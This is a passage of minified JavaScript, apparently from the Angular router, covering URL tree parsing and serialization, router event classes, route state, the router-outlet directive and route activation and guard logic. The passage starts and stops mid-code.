vme[e.paths](t.root,a.root,e.matrixParams)&&nL[e.queryParams](t.queryParams,a.queryParams)&&!("exact"===e.fragment&&t.fragment!==a.fragment)}function sL(t,a,e){return cL(t,a,a.segments,e)}function cL(t,a,e,i){if(t.segments.length>e.length){const n=t.segments.slice(0,e.length);return!(!fg(n,e)||a.hasChildren()||!q4(n,e,i))}if(t.segments.length===e.length){if(!fg(t.segments,e)||!q4(t.segments,e,i))return!1;for(const n in a.children)if(!t.children[n]||!sL(t.children[n],a.children[n],i))return!1;return!0}{const n=e.slice(0,t.segments.length),r=e.slice(t.segments.length);return!!(fg(t.segments,n)&&q4(t.segments,n,i)&&t.children[Nn])&&cL(t.children[Nn],a,r,i)}}function q4(t,a,e){return a.every((i,n)=>nL[e](t[n].parameters,i.parameters))}class hg{constructor(a,e,i){this.root=a,this.queryParams=e,this.fragment=i}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=M1(this.queryParams)),this._queryParamMap}toString(){return xme.serialize(this)}}class qn{constructor(a,e){this.segments=a,this.children=e,this.parent=null,oc(e,(i,n)=>i.parent=this)}hasChildren(){return this.numberOfChildren>0}get numberOfChildren(){return Object.keys(this.children).length}toString(){return G4(this)}}class by{constructor(a,e){this.path=a,this.parameters=e}get parameterMap(){return this._parameterMap||(this._parameterMap=M1(this.parameters)),this._parameterMap}toString(){return uL(this)}}function fg(t,a){return t.length===a.length&&t.every((e,i)=>e.path===a[i].path)}let lL=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return new Ax},providedIn:"root"}),t})();class Ax{parse(a){const e=new Lme(a);return new hg(e.parseRootSegment(),e.parseQueryParams(),e.parseFragment())}serialize(a){const e=`/${My(a.root,!0)}`,i=function Rme(t){const a=Object.keys(t).map(e=>{const i=t[e];return Array.isArray(i)?i.map(n=>`${j4(e)}=${j4(n)}`).join("&"):`${j4(e)}=${j4(i)}`}).filter(e=>!!e);return a.length?`?${a.join("&")}`:""}(a.queryParams);return`${e}${i}${"string"==typeof a.fragment?`#${function wme(t){return encodeURI(t)}(a.fragment)}`:""}`}}const xme=new Ax;function G4(t){return t.segments.map(a=>uL(a)).join("/")}function My(t,a){if(!t.hasChildren())return G4(t);if(a){const e=t.children[Nn]?My(t.children[Nn],!1):"",i=[];return oc(t.children,(n,r)=>{r!==Nn&&i.push(`${r}:${My(n,!1)}`)}),i.length>0?`${e}(${i.join("//")})`:e}{const e=function Dme(t,a){let e=[];return oc(t.children,(i,n)=>{n===Nn&&(e=e.concat(a(i,n)))}),oc(t.children,(i,n)=>{n!==Nn&&(e=e.concat(a(i,n)))}),e}(t,(i,n)=>n===Nn?[My(t.children[Nn],!1)]:[`${n}:${My(i,!1)}`]);return 1===Object.keys(t.children).length&&null!=t.children[Nn]?`${G4(t)}/${e[0]}`:`${G4(t)}/(${e.join("//")})`}}function dL(t){return encodeURIComponent(t).replace(/%40/g,"@").replace(/%3A/gi,":").replace(/%24/g,"$").replace(/%2C/gi,",")}function j4(t){return dL(t).replace(/%3B/gi,";")}function Tx(t){return dL(t).replace(/\(/g,"%28").replace(/\)/g,"%29").replace(/%26/gi,"&")}function Q4(t){return decodeURIComponent(t)}function mL(t){return Q4(t.replace(/\+/g,"%20"))}function uL(t){return`${Tx(t.path)}${function Ime(t){return Object.keys(t).map(a=>`;${Tx(a)}=${Tx(t[a])}`).join("")}(t.parameters)}`}const Sme=/^[^\/()?;=#]+/;function $4(t){const a=t.match(Sme);return a?a[0]:""}const kme=/^[^=?&#]+/,Ome=/^[^&#]+/;class Lme{constructor(a){this.url=a,this.remaining=a}parseRootSegment(){return this.consumeOptional("/"),""===this.remaining||this.peekStartsWith("?")||this.peekStartsWith("#")?new qn([],{}):new qn([],this.parseChildren())}parseQueryParams(){const a={};if(this.consumeOptional("?"))do{this.parseQueryParam(a)}while(this.consumeOptional("&"));return a}parseFragment(){return this.consumeOptional("#")?decodeURIComponent(this.remaining):null}parseChildren(){if(""===this.remaining)return{};this.consumeOptional("/");const a=[];for(this.peekStartsWith("(")||a.push(this.parseSegment());this.peekStartsWith("/")&&!this.peekStartsWith("//")&&!this.peekStartsWith("/(");)this.capture("/"),a.push(this.parseSegment());let e={};this.peekStartsWith("/(")&&(this.capture("/"),e=this.parseParens(!0));let i={};return this.peekStartsWith("(")&&(i=this.parseParens(!1)),(a.length>0||Object.keys(e).length>0)&&(i[Nn]=new qn(a,e)),i}parseSegment(){const a=$4(this.remaining);if(""===a&&this.peekStartsWith(";"))throw new gi(4009,!1);return this.capture(a),new by(Q4(a),this.parseMatrixParams())}parseMatrixParams(){const a={};for(;this.consumeOptional(";");)this.parseParam(a);return a}parseParam(a){const e=$4(this.remaining);if(!e)return;this.capture(e);let i="";if(this.consumeOptional("=")){const n=$4(this.remaining);n&&(i=n,this.capture(i))}a[Q4(e)]=Q4(i)}parseQueryParam(a){const e=function Pme(t){const a=t.match(kme);return a?a[0]:""}(this.remaining);if(!e)return;this.capture(e);let i="";if(this.consumeOptional("=")){const c=function Nme(t){const a=t.match(Ome);return a?a[0]:""}(this.remaining);c&&(i=c,this.capture(i))}const n=mL(e),r=mL(i);if(a.hasOwnProperty(n)){let c=a[n];Array.isArray(c)||(c=[c],a[n]=c),c.push(r)}else a[n]=r}parseParens(a){const e={};for(this.capture("(");!this.consumeOptional(")")&&this.remaining.length>0;){const i=$4(this.remaining),n=this.remaining[i.length];if("/"!==n&&")"!==n&&";"!==n)throw new gi(4010,!1);let r;i.indexOf(":")>-1?(r=i.slice(0,i.indexOf(":")),this.capture(r),this.capture(":")):a&&(r=Nn);const c=this.parseChildren();e[r]=1===Object.keys(c).length?c[Nn]:new qn([],c),this.consumeOptional("//")}return e}peekStartsWith(a){return this.remaining.startsWith(a)}consumeOptional(a){return!!this.peekStartsWith(a)&&(this.remaining=this.remaining.substring(a.length),!0)}capture(a){if(!this.consumeOptional(a))throw new gi(4011,!1)}}function Ex(t){return t.segments.length>0?new qn([],{[Nn]:t}):t}function K4(t){const a={};for(const i of Object.keys(t.children)){const r=K4(t.children[i]);(r.segments.length>0||r.hasChildren())&&(a[i]=r)}return function zme(t){if(1===t.numberOfChildren&&t.children[Nn]){const a=t.children[Nn];return new qn(t.segments.concat(a.segments),a.children)}return t}(new qn(t.segments,a))}function pg(t){return t instanceof hg}function Vme(t,a,e,i,n){var r;if(0===e.length)return v1(a.root,a.root,a.root,i,n);const d=function pL(t){if("string"==typeof t[0]&&1===t.length&&"/"===t[0])return new fL(!0,0,t);let a=0,e=!1;const i=t.reduce((n,r,c)=>{if("object"==typeof r&&null!=r){if(r.outlets){const d={};return oc(r.outlets,(T,k)=>{d[k]="string"==typeof T?T.split("/"):T}),[...n,{outlets:d}]}if(r.segmentPath)return[...n,r.segmentPath]}return"string"!=typeof r?[...n,r]:0===c?(r.split("/").forEach((d,T)=>{0==T&&"."===d||(0==T&&""===d?e=!0:".."===d?a++:""!=d&&n.push(d))}),n):[...n,r]},[]);return new fL(e,a,i)}(e);return d.toRoot()?v1(a.root,a.root,new qn([],{}),i,n):function T(q){var Y;const te=function Hme(t,a,e,i){if(t.isAbsolute)return new A1(a.root,!0,0);if(-1===i)return new A1(e,e===a.root,0);return function _L(t,a,e){let i=t,n=a,r=e;for(;r>n;){if(r-=n,i=i.parent,!i)throw new gi(4005,!1);n=i.segments.length}return new A1(i,!1,n-r)}(e,i+(vy(t.commands[0])?0:1),t.numberOfDoubleDots)}(d,a,null===(Y=t.snapshot)||void 0===Y?void 0:Y._urlSegment,q),pe=te.processChildren?Ty(te.segmentGroup,te.index,d.commands):xx(te.segmentGroup,te.index,d.commands);return v1(a.root,te.segmentGroup,pe,i,n)}(null===(r=t.snapshot)||void 0===r?void 0:r._lastPathIndex)}function vy(t){return"object"==typeof t&&null!=t&&!t.outlets&&!t.segmentPath}function Ay(t){return"object"==typeof t&&null!=t&&t.outlets}function v1(t,a,e,i,n){let c,r={};i&&oc(i,(T,k)=>{r[k]=Array.isArray(T)?T.map(q=>`${q}`):`${T}`}),c=t===a?e:hL(t,a,e);const d=Ex(K4(c));return new hg(d,r,n)}function hL(t,a,e){const i={};return oc(t.children,(n,r)=>{i[r]=n===a?e:hL(n,a,e)}),new qn(t.segments,i)}class fL{constructor(a,e,i){if(this.isAbsolute=a,this.numberOfDoubleDots=e,this.commands=i,a&&i.length>0&&vy(i[0]))throw new gi(4003,!1);const n=i.find(Ay);if(n&&n!==aL(i))throw new gi(4004,!1)}toRoot(){return this.isAbsolute&&1===this.commands.length&&"/"==this.commands[0]}}class A1{constructor(a,e,i){this.segmentGroup=a,this.processChildren=e,this.index=i}}function xx(t,a,e){if(t||(t=new qn([],{})),0===t.segments.length&&t.hasChildren())return Ty(t,a,e);const i=function qme(t,a,e){let i=0,n=a;const r={match:!1,pathIndex:0,commandIndex:0};for(;n<t.segments.length;){if(i>=e.length)return r;const c=t.segments[n],d=e[i];if(Ay(d))break;const T=`${d}`,k=i<e.length-1?e[i+1]:null;if(n>0&&void 0===T)break;if(T&&k&&"object"==typeof k&&void 0===k.outlets){if(!CL(T,k,c))return r;i+=2}else{if(!CL(T,{},c))return r;i++}n++}return{match:!0,pathIndex:n,commandIndex:i}}(t,a,e),n=e.slice(i.commandIndex);if(i.match&&i.pathIndex<t.segments.length){const r=new qn(t.segments.slice(0,i.pathIndex),{});return r.children[Nn]=new qn(t.segments.slice(i.pathIndex),t.children),Ty(r,0,n)}return i.match&&0===n.length?new qn(t.segments,{}):i.match&&!t.hasChildren()?wx(t,a,e):i.match?Ty(t,0,n):wx(t,a,e)}function Ty(t,a,e){if(0===e.length)return new qn(t.segments,{});{const i=function Ume(t){return Ay(t[0])?t[0].outlets:{[Nn]:t}}(e),n={};return oc(i,(r,c)=>{"string"==typeof r&&(r=[r]),null!==r&&(n[c]=xx(t.children[c],a,r))}),oc(t.children,(r,c)=>{void 0===i[c]&&(n[c]=r)}),new qn(t.segments,n)}}function wx(t,a,e){const i=t.segments.slice(0,a);let n=0;for(;n<e.length;){const r=e[n];if(Ay(r)){const T=Gme(r.outlets);return new qn(i,T)}if(0===n&&vy(e[0])){i.push(new by(t.segments[a].path,gL(e[0]))),n++;continue}const c=Ay(r)?r.outlets[Nn]:`${r}`,d=n<e.length-1?e[n+1]:null;c&&d&&vy(d)?(i.push(new by(c,gL(d))),n+=2):(i.push(new by(c,{})),n++)}return new qn(i,{})}function Gme(t){const a={};return oc(t,(e,i)=>{"string"==typeof e&&(e=[e]),null!==e&&(a[i]=wx(new qn([],{}),0,e))}),a}function gL(t){const a={};return oc(t,(e,i)=>a[i]=`${e}`),a}function CL(t,a,e){return t==e.path&&mu(a,e.parameters)}class kh{constructor(a,e){this.id=a,this.url=e}}class Ey extends kh{constructor(a,e,i="imperative",n=null){super(a,e),this.type=0,this.navigationTrigger=i,this.restoredState=n}toString(){return`NavigationStart(id: ${this.id}, url: '${this.url}')`}}class Ph extends kh{constructor(a,e,i){super(a,e),this.urlAfterRedirects=i,this.type=1}toString(){return`NavigationEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}')`}}class X4 extends kh{constructor(a,e,i,n){super(a,e),this.reason=i,this.code=n,this.type=2}toString(){return`NavigationCancel(id: ${this.id}, url: '${this.url}')`}}class yL extends kh{constructor(a,e,i,n){super(a,e),this.error=i,this.target=n,this.type=3}toString(){return`NavigationError(id: ${this.id}, url: '${this.url}', error: ${this.error})`}}class jme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=4}toString(){return`RoutesRecognized(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Qme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=7}toString(){return`GuardsCheckStart(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class $me extends kh{constructor(a,e,i,n,r){super(a,e),this.urlAfterRedirects=i,this.state=n,this.shouldActivate=r,this.type=8}toString(){return`GuardsCheckEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state}, shouldActivate: ${this.shouldActivate})`}}class Kme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=5}toString(){return`ResolveStart(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Xme extends kh{constructor(a,e,i,n){super(a,e),this.urlAfterRedirects=i,this.state=n,this.type=6}toString(){return`ResolveEnd(id: ${this.id}, url: '${this.url}', urlAfterRedirects: '${this.urlAfterRedirects}', state: ${this.state})`}}class Yme{constructor(a){this.route=a,this.type=9}toString(){return`RouteConfigLoadStart(path: ${this.route.path})`}}class Jme{constructor(a){this.route=a,this.type=10}toString(){return`RouteConfigLoadEnd(path: ${this.route.path})`}}class Zme{constructor(a){this.snapshot=a,this.type=11}toString(){return`ChildActivationStart(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class eue{constructor(a){this.snapshot=a,this.type=12}toString(){return`ChildActivationEnd(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class tue{constructor(a){this.snapshot=a,this.type=13}toString(){return`ActivationStart(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class iue{constructor(a){this.snapshot=a,this.type=14}toString(){return`ActivationEnd(path: '${this.snapshot.routeConfig&&this.snapshot.routeConfig.path||""}')`}}class bL{constructor(a,e,i){this.routerEvent=a,this.position=e,this.anchor=i,this.type=15}toString(){return`Scroll(anchor: '${this.anchor}', position: '${this.position?`${this.position[0]}, ${this.position[1]}`:null}')`}}class ML{constructor(a){this._root=a}get root(){return this._root.value}parent(a){const e=this.pathFromRoot(a);return e.length>1?e[e.length-2]:null}children(a){const e=Ix(a,this._root);return e?e.children.map(i=>i.value):[]}firstChild(a){const e=Ix(a,this._root);return e&&e.children.length>0?e.children[0].value:null}siblings(a){const e=Rx(a,this._root);return e.length<2?[]:e[e.length-2].children.map(n=>n.value).filter(n=>n!==a)}pathFromRoot(a){return Rx(a,this._root).map(e=>e.value)}}function Ix(t,a){if(t===a.value)return a;for(const e of a.children){const i=Ix(t,e);if(i)return i}return null}function Rx(t,a){if(t===a.value)return[a];for(const e of a.children){const i=Rx(t,e);if(i.length)return i.unshift(a),i}return[]}class Oh{constructor(a,e){this.value=a,this.children=e}toString(){return`TreeNode(${this.value})`}}function T1(t){const a={};return t&&t.children.forEach(e=>a[e.value.outlet]=e),a}class vL extends ML{constructor(a,e){super(a),this.snapshot=e,Sx(this,a)}toString(){return this.snapshot.toString()}}function AL(t,a){const e=function nue(t,a){const c=new Y4([],{},{},"",{},Nn,a,null,t.root,-1,{});return new EL("",new Oh(c,[]))}(t,a),i=new zs([new by("",{})]),n=new zs({}),r=new zs({}),c=new zs({}),d=new zs(""),T=new Tl(i,n,c,d,r,Nn,a,e.root);return T.snapshot=e.root,new vL(new Oh(T,[]),e)}class Tl{constructor(a,e,i,n,r,c,d,T){var k,q;this.url=a,this.params=e,this.queryParams=i,this.fragment=n,this.data=r,this.outlet=c,this.component=d,this.title=null!==(q=null===(k=this.data)||void 0===k?void 0:k.pipe(Xe(Y=>Y[yy])))&&void 0!==q?q:Bi(void 0),this._futureSnapshot=T}get routeConfig(){return this._futureSnapshot.routeConfig}get root(){return this._routerState.root}get parent(){return this._routerState.parent(this)}get firstChild(){return this._routerState.firstChild(this)}get children(){return this._routerState.children(this)}get pathFromRoot(){return this._routerState.pathFromRoot(this)}get paramMap(){return this._paramMap||(this._paramMap=this.params.pipe(Xe(a=>M1(a)))),this._paramMap}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=this.queryParams.pipe(Xe(a=>M1(a)))),this._queryParamMap}toString(){return this.snapshot?this.snapshot.toString():`Future(${this._futureSnapshot})`}}function TL(t,a="emptyOnly"){const e=t.pathFromRoot;let i=0;if("always"!==a)for(i=e.length-1;i>=1;){const n=e[i],r=e[i-1];if(n.routeConfig&&""===n.routeConfig.path)i--;else{if(r.component)break;i--}}return function oue(t){return t.reduce((a,e)=>{var i;return{params:Object.assign(Object.assign({},a.params),e.params),data:Object.assign(Object.assign({},a.data),e.data),resolve:Object.assign(Object.assign(Object.assign(Object.assign({},e.data),a.resolve),null===(i=e.routeConfig)||void 0===i?void 0:i.data),e._resolvedData)}},{params:{},data:{},resolve:{}})}(e.slice(i))}class Y4{constructor(a,e,i,n,r,c,d,T,k,q,Y,te){var pe;this.url=a,this.params=e,this.queryParams=i,this.fragment=n,this.data=r,this.outlet=c,this.component=d,this.title=null===(pe=this.data)||void 0===pe?void 0:pe[yy],this.routeConfig=T,this._urlSegment=k,this._lastPathIndex=q,this._correctedLastPathIndex=null!=te?te:q,this._resolve=Y}get root(){return this._routerState.root}get parent(){return this._routerState.parent(this)}get firstChild(){return this._routerState.firstChild(this)}get children(){return this._routerState.children(this)}get pathFromRoot(){return this._routerState.pathFromRoot(this)}get paramMap(){return this._paramMap||(this._paramMap=M1(this.params)),this._paramMap}get queryParamMap(){return this._queryParamMap||(this._queryParamMap=M1(this.queryParams)),this._queryParamMap}toString(){return`Route(url:'${this.url.map(i=>i.toString()).join("/")}', path:'${this.routeConfig?this.routeConfig.path:""}')`}}class EL extends ML{constructor(a,e){super(e),this.url=a,Sx(this,e)}toString(){return DL(this._root)}}function Sx(t,a){a.value._routerState=t,a.children.forEach(e=>Sx(t,e))}function DL(t){const a=t.children.length>0?` { ${t.children.map(DL).join(", ")} } `:"";return`${t.value}${a}`}function kx(t){if(t.snapshot){const a=t.snapshot,e=t._futureSnapshot;t.snapshot=e,mu(a.queryParams,e.queryParams)||t.queryParams.next(e.queryParams),a.fragment!==e.fragment&&t.fragment.next(e.fragment),mu(a.params,e.params)||t.params.next(e.params),function bme(t,a){if(t.length!==a.length)return!1;for(let e=0;e<t.length;++e)if(!mu(t[e],a[e]))return!1;return!0}(a.url,e.url)||t.url.next(e.url),mu(a.data,e.data)||t.data.next(e.data)}else t.snapshot=t._futureSnapshot,t.data.next(t._futureSnapshot.data)}function Px(t,a){const e=mu(t.params,a.params)&&function Eme(t,a){return fg(t,a)&&t.every((e,i)=>mu(e.parameters,a[i].parameters))}(t.url,a.url);return e&&!(!t.parent!=!a.parent)&&(!t.parent||Px(t.parent,a.parent))}function Dy(t,a,e){if(e&&t.shouldReuseRoute(a.value,e.value.snapshot)){const i=e.value;i._futureSnapshot=a.value;const n=function sue(t,a,e){return a.children.map(i=>{for(const n of e.children)if(t.shouldReuseRoute(i.value,n.value.snapshot))return Dy(t,i,n);return Dy(t,i)})}(t,a,e);return new Oh(i,n)}{if(t.shouldAttach(a.value)){const r=t.retrieve(a.value);if(null!==r){const c=r.route;return c.value._futureSnapshot=a.value,c.children=a.children.map(d=>Dy(t,d)),c}}const i=function cue(t){return new Tl(new zs(t.url),new zs(t.params),new zs(t.queryParams),new zs(t.fragment),new zs(t.data),t.outlet,t.component,t)}(a.value),n=a.children.map(r=>Dy(t,r));return new Oh(i,n)}}const Ox="ngNavigationCancelingError";function xL(t,a){const{redirectTo:e,navigationBehaviorOptions:i}=pg(a)?{redirectTo:a,navigationBehaviorOptions:void 0}:a,n=wL(!1,0,a);return n.url=e,n.navigationBehaviorOptions=i,n}function wL(t,a,e){const i=new Error("NavigationCancelingError: "+(t||""));return i[Ox]=!0,i.cancellationCode=a,e&&(i.url=e),i}function IL(t){return RL(t)&&pg(t.url)}function RL(t){return t&&t[Ox]}class lue{constructor(){this.outlet=null,this.route=null,this.resolver=null,this.injector=null,this.children=new xy,this.attachRef=null}}let xy=(()=>{class t{constructor(){this.contexts=new Map}onChildOutletCreated(e,i){const n=this.getOrCreateContext(e);n.outlet=i,this.contexts.set(e,n)}onChildOutletDestroyed(e){const i=this.getContext(e);i&&(i.outlet=null,i.attachRef=null)}onOutletDeactivated(){const e=this.contexts;return this.contexts=new Map,e}onOutletReAttached(e){this.contexts=e}getOrCreateContext(e){let i=this.getContext(e);return i||(i=new lue,this.contexts.set(e,i)),i}getContext(e){return this.contexts.get(e)||null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const J4=!1;let Nx=(()=>{class t{constructor(e,i,n,r,c){this.parentContexts=e,this.location=i,this.changeDetector=r,this.environmentInjector=c,this.activated=null,this._activatedRoute=null,this.activateEvents=new Tt,this.deactivateEvents=new Tt,this.attachEvents=new Tt,this.detachEvents=new Tt,this.name=n||Nn,e.onChildOutletCreated(this.name,this)}ngOnDestroy(){var e;(null===(e=this.parentContexts.getContext(this.name))||void 0===e?void 0:e.outlet)===this&&this.parentContexts.onChildOutletDestroyed(this.name)}ngOnInit(){if(!this.activated){const e=this.parentContexts.getContext(this.name);e&&e.route&&(e.attachRef?this.attach(e.attachRef,e.route):this.activateWith(e.route,e.injector))}}get isActivated(){return!!this.activated}get component(){if(!this.activated)throw new gi(4012,J4);return this.activated.instance}get activatedRoute(){if(!this.activated)throw new gi(4012,J4);return this._activatedRoute}get activatedRouteData(){return this._activatedRoute?this._activatedRoute.snapshot.data:{}}detach(){if(!this.activated)throw new gi(4012,J4);this.location.detach();const e=this.activated;return this.activated=null,this._activatedRoute=null,this.detachEvents.emit(e.instance),e}attach(e,i){this.activated=e,this._activatedRoute=i,this.location.insert(e.hostView),this.attachEvents.emit(e.instance)}deactivate(){if(this.activated){const e=this.component;this.activated.destroy(),this.activated=null,this._activatedRoute=null,this.deactivateEvents.emit(e)}}activateWith(e,i){if(this.isActivated)throw new gi(4013,J4);this._activatedRoute=e;const n=this.location,c=e._futureSnapshot.component,d=this.parentContexts.getOrCreateContext(this.name).children,T=new due(e,d,n.injector);if(i&&function mue(t){return!!t.resolveComponentFactory}(i)){const k=i.resolveComponentFactory(c);this.activated=n.createComponent(k,n.length,T)}else this.activated=n.createComponent(c,{index:n.length,injector:T,environmentInjector:null!=i?i:this.environmentInjector});this.changeDetector.markForCheck(),this.activateEvents.emit(this.activated.instance)}}return t.\u0275fac=function(e){return new(e||t)(Ee(xy),Ee(fo),Vr("name"),Ee(Ma),Ee(Ht))},t.\u0275dir=Ot({type:t,selectors:[["router-outlet"]],outputs:{activateEvents:"activate",deactivateEvents:"deactivate",attachEvents:"attach",detachEvents:"detach"},exportAs:["outlet"],standalone:!0}),t})();class due{constructor(a,e,i){this.route=a,this.childContexts=e,this.parent=i}get(a,e){return a===Tl?this.route:a===xy?this.childContexts:this.parent.get(a,e)}}let Lx=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],standalone:!0,features:[Lk],decls:1,vars:0,template:function(e,i){1&e&&it(0,"router-outlet")},dependencies:[Nx],encapsulation:2}),t})();function SL(t,a){var e;return t.providers&&!t._injector&&(t._injector=Sv(t.providers,a,`Route: ${t.path}`)),null!==(e=t._injector)&&void 0!==e?e:a}function Wx(t){const a=t.children&&t.children.map(Wx),e=a?Object.assign(Object.assign({},t),{children:a}):Object.assign({},t);return!e.component&&!e.loadComponent&&(a||e.loadChildren)&&e.outlet&&e.outlet!==Nn&&(e.component=Lx),e}function wd(t){return t.outlet||Nn}function kL(t,a){const e=t.filter(i=>wd(i)===a);return e.push(...t.filter(i=>wd(i)!==a)),e}function wy(t){var a;if(!t)return null;if(null!==(a=t.routeConfig)&&void 0!==a&&a._injector)return t.routeConfig._injector;for(let e=t.parent;e;e=e.parent){const i=e.routeConfig;if(null!=i&&i._loadedInjector)return i._loadedInjector;if(null!=i&&i._injector)return i._injector}return null}class _ue{constructor(a,e,i,n){this.routeReuseStrategy=a,this.futureState=e,this.currState=i,this.forwardEvent=n}activate(a){const e=this.futureState._root,i=this.currState?this.currState._root:null;this.deactivateChildRoutes(e,i,a),kx(this.futureState.root),this.activateChildRoutes(e,i,a)}deactivateChildRoutes(a,e,i){const n=T1(e);a.children.forEach(r=>{const c=r.value.outlet;this.deactivateRoutes(r,n[c],i),delete n[c]}),oc(n,(r,c)=>{this.deactivateRouteAndItsChildren(r,i)})}deactivateRoutes(a,e,i){const n=a.value,r=e?e.value:null;if(n===r)if(n.component){const c=i.getContext(n.outlet);c&&this.deactivateChildRoutes(a,e,c.children)}else this.deactivateChildRoutes(a,e,i);else r&&this.deactivateRouteAndItsChildren(e,i)}deactivateRouteAndItsChildren(a,e){a.value.component&&this.routeReuseStrategy.shouldDetach(a.value.snapshot)?this.detachAndStoreRouteSubtree(a,e):this.deactivateRouteAndOutlet(a,e)}detachAndStoreRouteSubtree(a,e){const i=e.getContext(a.value.outlet),n=i&&a.value.component?i.children:e,r=T1(a);for(const c of Object.keys(r))this.deactivateRouteAndItsChildren(r[c],n);if(i&&i.outlet){const c=i.outlet.detach(),d=i.children.onOutletDeactivated();this.routeReuseStrategy.store(a.value.snapshot,{componentRef:c,route:a,contexts:d})}}deactivateRouteAndOutlet(a,e){const i=e.getContext(a.value.outlet),n=i&&a.value.component?i.children:e,r=T1(a);for(const c of Object.keys(r))this.deactivateRouteAndItsChildren(r[c],n);i&&i.outlet&&(i.outlet.deactivate(),i.children.onOutletDeactivated(),i.attachRef=null,i.resolver=null,i.route=null)}activateChildRoutes(a,e,i){const n=T1(e);a.children.forEach(r=>{this.activateRoutes(r,n[r.value.outlet],i),this.forwardEvent(new iue(r.value.snapshot))}),a.children.length&&this.forwardEvent(new eue(a.value.snapshot))}activateRoutes(a,e,i){var n;const r=a.value,c=e?e.value:null;if(kx(r),r===c)if(r.component){const d=i.getOrCreateContext(r.outlet);this.activateChildRoutes(a,e,d.children)}else this.activateChildRoutes(a,e,i);else if(r.component){const d=i.getOrCreateContext(r.outlet);if(this.routeReuseStrategy.shouldAttach(r.snapshot)){const T=this.routeReuseStrategy.retrieve(r.snapshot);this.routeReuseStrategy.store(r.snapshot,null),d.children.onOutletReAttached(T.contexts),d.attachRef=T.componentRef,d.route=T.route.value,d.outlet&&d.outlet.attach(T.componentRef,T.route.value),kx(T.route.value),this.activateChildRoutes(a,null,d.children)}else{const T=wy(r.snapshot),k=null!==(n=null==T?void 0:T.get(On))&&void 0!==n?n:null;d.attachRef=null,d.route=r,d.resolver=k,d.injector=T,d.outlet&&d.outlet.activateWith(r,d.injector),this.activateChildRoutes(a,null,d.children)}}else this.activateChildRoutes(a,null,i)}}class PL{constructor(a){this.path=a,this.route=this.path[this.path.length-1]}}class Z4{constructor(a,e){this.component=a,this.route=e}}function gue(t,a,e){const i=t._root;return Iy(i,a?a._root:null,e,[i.value])}function E1(t,a){const e=Symbol(),i=a.get(t,e);return i===e?"function"!=typeof t||function t0(t){return null!==Hu(t)}(t)?a.get(t):t:i}function Iy(t,a,e,i,n={canDeactivateChecks:[],canActivateChecks:[]}){const r=T1(a);return t.children.forEach(c=>{(function yue(t,a,e,i,n={canDeactivateChecks:[],canActivateChecks:[]}){const r=t.value,c=a?a.value:null,d=e?e.getContext(t.value.outlet):null;if(c&&r.routeConfig===c.routeConfig){const T=function bue(t,a,e){if("function"==typeof e)return e(t,a);switch(e){case"pathParamsChange":return!fg(t.url,a.url);case"pathParamsOrQueryParamsChange":return!fg(t.url,a.url)||!mu(t.queryParams,a.queryParams);case"always":return!0;case"paramsOrQueryParamsChange":return!Px(t,a)||!mu(t.queryParams,a.queryParams);default:return!Px(t,a)}}(c,r,r.routeConfig.runGuardsAndResolvers);T?n.canActivateChecks.push(new PL(i)):(r.data=c.data,r._resolvedData=c._resolvedData),Iy(t,a,r.component?d?d.children:null:e,i,n),T&&d&&d.outlet&&d.outlet.isActivated&&n.canDeactivateChecks.push(new Z4(d.outlet.component,c))}else c&&Ry(a,d,n),n.canActivateChecks.push(new PL(i)),Iy(t,null,r.component?d?d.children:null:e,i,n)})(c,r[c.value.outlet],e,i.concat([c.value]),n),delete r[c.value.outlet]}),oc(r,(c,d)=>Ry(c,e.getContext(d),n)),n}function Ry(t,a,e){const i=T1(t),n=t.value;oc(i,(r,c)=>{Ry(r,n.component?a?a.children.getContext(c):null:a,e)}),e.canDeactivateChecks.push(new Z4(n.component&&a&&a.outlet&&a.outlet.isActivated?a.outlet.component:null,n))}function Sy(t){return"function"==typeof t}function Fx(t){return t instanceof V4||"EmptyError"===(null==t?void 0:t.name)}const e3=Symbol("INITIAL_VALUE");function D1(){return Ur(t=>mg(t.map(a=>a.pipe(Cn(1),Ro(e3)))).pipe(Xe(a=>{for(const e of a)if(!0!==e){if(e===e3)return e3;if(!1===e||e instanceof hg)return e}return!0}),Dn(a=>a!==e3),Cn(1)))}function OL(t){return function v(...t){return P(t)}(qr(a=>{if(pg(a))throw xL(0,a)}),Xe(a=>!0===a))}const Vx={matched:!1,consumedSegments:[],remainingSegments:[],parameters:{},positionalParamSegments:{}};function NL(t,a,e,i,n){const r=Bx(t,a,e);return r.matched?function zue(t,a,e,i){const n=a.canMatch;return n&&0!==n.length?Bi(n.map(c=>{const d=E1(c,t);return sp(function Due(t){return t&&Sy(t.canMatch)}(d)?d.canMatch(a,e):t.runInContext(()=>d(a,e)))})).pipe(D1(),OL()):Bi(!0)}(i=SL(a,i),a,e).pipe(Xe(c=>!0===c?r:Object.assign({},Vx))):Bi(r)}function Bx(t,a,e){var i;if(""===a.path)return"full"===a.pathMatch&&(t.hasChildren()||e.length>0)?Object.assign({},Vx):{matched:!0,consumedSegments:[],remainingSegments:e,parameters:{},positionalParamSegments:{}};const r=(a.matcher||yme)(e,t,a);if(!r)return Object.assign({},Vx);const c={};oc(r.posParams,(T,k)=>{c[k]=T.path});const 